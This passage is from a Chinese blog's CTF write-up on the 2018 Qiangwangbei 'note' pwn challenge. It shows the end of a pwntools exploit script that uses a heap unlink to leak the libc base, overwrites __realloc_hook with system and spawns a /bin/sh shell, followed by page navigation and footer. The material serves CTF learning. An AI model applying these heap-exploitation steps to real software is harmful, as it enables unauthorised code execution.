class="number">0x68</span>,<span class="string">'A'</span>*<span class="number">0x38</span>+p64(<span class="number">0x41</span>)+<span class="string">'\n'</span>)</span><br><span class="line">    title(payload+<span class="string">'@'</span>)</span><br><span class="line"></span><br><span class="line">    content(<span class="number">0x5000</span>,<span class="string">'this step is to free one original content chunk\n'</span>)</span><br><span class="line">    time.sleep(<span class="number">0.5</span>)</span><br><span class="line">    content(<span class="number">0x20000</span>,<span class="string">'this step is to unlink\n'</span>)</span><br><span class="line">    time.sleep(<span class="number">0.5</span>)</span><br><span class="line"></span><br><span class="line">    title(p64(<span class="number">0x602050</span>)+p64(<span class="number">0x601fd0</span>)+<span class="string">'\n'</span>)</span><br><span class="line">    show()</span><br><span class="line">    p.recvuntil(<span class="string">'The content is:'</span>)</span><br><span class="line">    libc.address = u64(p.recvuntil(<span class="string">'\n'</span>,drop=<span class="keyword">True</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))-libc.symbols[<span class="string">'atoi'</span>]</span><br><span class="line">    print(<span class="string">'The libc base address is:'</span> + hex(libc.address))</span><br><span class="line">    __realloc_hook = libc.symbols[<span class="string">'__realloc_hook'</span>]</span><br><span class="line">    print(<span class="string">'The realloc_hook address is:'</span>+hex(__realloc_hook))</span><br><span class="line">    system = libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">    print(<span class="string">'The system address is:'</span>+hex(system))</span><br><span class="line">    binsh_addr = next(libc.search(<span class="string">'/bin/sh'</span>))</span><br><span class="line">    print(<span class="string">'The binsh address is:'</span>+hex(binsh_addr))</span><br><span class="line"></span><br><span class="line">    <span class="comment">#这一步会使得之后调用realloc变成调用system</span></span><br><span class="line">    title(p64(__realloc_hook)+<span class="string">'\n'</span>)</span><br><span class="line">    time.sleep(<span class="number">0.5</span>)</span><br><span class="line">    comment(p64(system)+<span class="string">'\n'</span>)</span><br><span class="line">    time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    title(p64(<span class="number">0x602050</span>)+p64(binsh_addr)+<span class="string">'\n'</span>)</span><br><span class="line">    time.sleep(<span class="number">1</span>)</span><br><span class="line">    comment(p64(<span class="number">0</span>)+<span class="string">'\n'</span>)</span><br><span class="line">    time.sleep(<span class="number">0.5</span>)</span><br><span class="line"></span><br><span class="line">    p.recvuntil(<span class="string">'option---&gt;&gt;\n'</span>)</span><br><span class="line">    p.sendline(str(<span class="number">2</span>))</span><br><span class="line">    p.recvuntil(<span class="string">'Enter the content size(64-256):'</span>)</span><br><span class="line">    p.sendline(<span class="string">'0x100'</span>)</span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">'/home/pur3uit/build/build-2.25/lib/libc.so.6'</span>)</span><br><span class="line">exploit()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<h3 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h3><p><a href="http://tacxingxing.com/2018/03/28/2018qwb/" target="_blank" rel="noopener">2018强网杯writeup</a></p>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/06/26/运行不同glibc版本的文件/" rel="next" title="运行不同glibc版本的文件">
                <i class="fa fa-chevron-left"></i> 运行不同glibc版本的文件
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/08/04/强网杯pwn-note2利用分析/" rel="prev" title="强网杯pwn-note2利用分析">
                强网杯pwn-note2利用分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Pur3uit</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">7</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">2</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#背景知识"><span class="nav-number">1.</span> <span class="nav-text">背景知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#realloc函数的处理流程"><span class="nav-number">2.</span> <span class="nav-text">realloc函数的处理流程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#什么是RELRO技术，怎么绕过"><span class="nav-number">3.</span> <span class="nav-text">什么是RELRO技术，怎么绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#note中的一字节堆溢出漏洞"><span class="nav-number">4.</span> <span class="nav-text">note中的一字节堆溢出漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用过程"><span class="nav-number">5.</span> <span class="nav-text">利用过程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#参考链接"><span class="nav-number">6.</span> <span class="nav-text">参考链接</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Pur3uit</span>

  

  
</div>




  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动 v3.7.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/theme-next/hexo-theme-next">NexT.Pisces</a> v6.1.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.1.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.1.0"></script>



  



	





  





  










  





  

  

  

  
  

  
  

  


  
  

  

  

  

  

</body>
</html>
